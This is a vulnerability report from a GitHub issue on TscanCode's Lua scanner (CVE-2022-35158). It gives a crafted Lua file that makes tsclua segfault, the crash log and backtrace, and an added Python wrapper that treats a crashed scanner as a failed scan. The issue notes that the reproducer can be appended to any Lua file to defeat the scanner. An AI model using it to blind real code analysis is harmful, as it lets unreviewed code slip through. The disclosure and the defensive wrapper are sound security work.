CVE-2022-35158: TscLua crash · Issue #65 · Tencent/TscanCode

A vulnerability in the lua parser of TscanCode tsclua v2.15.01 allows attackers to cause a Denial of Service (DoS) via a crafted lua script.


The constructed Lua file is shown below; it can also be appended to any Lua file to defeat the scanner:

function test(a)
    local result = false
    if result then
        if a[0] == "A" then
            result = true
            print("A")
        else
            print("B")
        end
    end

    if result then
        print("C")
    else
        print("D")
    end
end

test({"A", "B"})

Normal run:

$ lua -v       
Lua 5.3.3  Copyright (C) 1994-2016 Lua.org, PUC-Rio
$ lua test.lua 
D

Crash:

$ ./tsclua test.lua 
tokenize...
[tokenize][1/1] /home/firmy/TscLua/test.lua
analyze entry file...
check...
[preRuleAnalyze][1/9] uninitvar
[preRuleAnalyze][2/9] OrTrue
[preRuleAnalyze][3/9] intercall
[preRuleAnalyze][4/9] CheckOther
[preRuleAnalyze][5/9] Style
[preRuleAnalyze][6/9] scope
[preRuleAnalyze][7/9] CheckOther2
[preRuleAnalyze][8/9] logic
[preRuleAnalyze][9/9] CheckGlobalVar
[check][1/1] /home/firmy/TscLua/test.lua
[1]    340431 segmentation fault (core dumped)  ./tsclua test.lua


     0x41d75c <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov    rbx, rdi
     0x41d75f <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov    rax, QWORD PTR [rdx+0x20]
 →   0x41d763 <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> mov    rcx, QWORD PTR [rax+0x8]
     0x41d767 <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> cmp    QWORD PTR [rax], rcx
     0x41d76a <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> je     0x41d778 <_ZN15CCheckUninitVar25HandleSpecialIfNotRequireEPK5Token+40>
     0x41d76c <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> pop    rbx
     0x41d76d <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> ret    
     0x41d76e <CCheckUninitVar::HandleSpecialIfNotRequire(Token+0> xchg   ax, ax
[#0] Id 1, Name: "tsclua", stopped 0x41d763 in CCheckUninitVar::HandleSpecialIfNotRequire(Token const*) (), reason: SIGSEGV
[#1] 0x4220b2 → CCheckUninitVar::HandleIf(Token const*)()
[#2] 0x42748b → CCheckUninitVar::CheckUninitVar()()
[#3] 0x49af81 → LuaCheck::check()()
[#4] 0x4e0bd7 → LuaCheckExecutor::check(int, char const* const*)()
[#5] 0x41afb4 → main()

If possible, please help request a CVE. Thanks!
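The practical risk in a report like this is that a file which crashes the scanner passes through unscanned. The following is an added example, not code from the issue or from TscanCode: a small triage wrapper that runs an analyzer binary (assumed to be `./tsclua`, as in the report) on a Lua file and treats a signal-killed or hung scanner as a failed scan rather than a clean pass. The embedded Lua reproducer is a constructed copy of the one above.

```python
"""Triage wrapper: run a static analyzer on a file and classify the outcome.
Only a clean exit counts as a passing scan; a crash (SIGSEGV etc.) or a hang
is reported as such so CI does not mistake a dead scanner for a clean result."""
import signal
import subprocess
import sys
import tempfile
from pathlib import Path

# Constructed copy of the crash reproducer from the issue (example input).
CRASH_LUA = """\
function test(a)
    local result = false
    if result then
        if a[0] == "A" then
            result = true
        end
    end
end
test({"A", "B"})
"""


def classify(returncode, timed_out):
    """Map a process result to a verdict string."""
    if timed_out:
        return "hang"
    if returncode < 0:
        # POSIX: a negative return code means the child was killed by signal
        # abs(returncode); -11 is SIGSEGV, the case seen in the report.
        return "crash:" + signal.Signals(-returncode).name
    return "ok" if returncode == 0 else "findings:%d" % returncode


def run_scanner(cmd, lua_path, timeout=30.0):
    """Run `cmd <lua_path>` under a timeout and return (verdict, stdout)."""
    argv = [*cmd, str(lua_path)]
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return classify(None, True), ""
    return classify(proc.returncode, False), proc.stdout


def scan_passes(verdict):
    """A crashed or hung analyzer must block, not pass, the file."""
    return verdict == "ok"


if __name__ == "__main__":
    scanner = sys.argv[1:] or ["./tsclua"]  # assumed binary path, as in the report
    with tempfile.TemporaryDirectory() as tmp:
        path = Path(tmp) / "test.lua"
        path.write_text(CRASH_LUA)
        verdict, out = run_scanner(scanner, path)
        print(verdict, "PASS" if scan_passes(verdict) else "FAIL")
```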

ben620 (Collaborator) commented Apr 28, 2022

A new version has been released. Please try again, and if you find new problems, feedback is welcome.
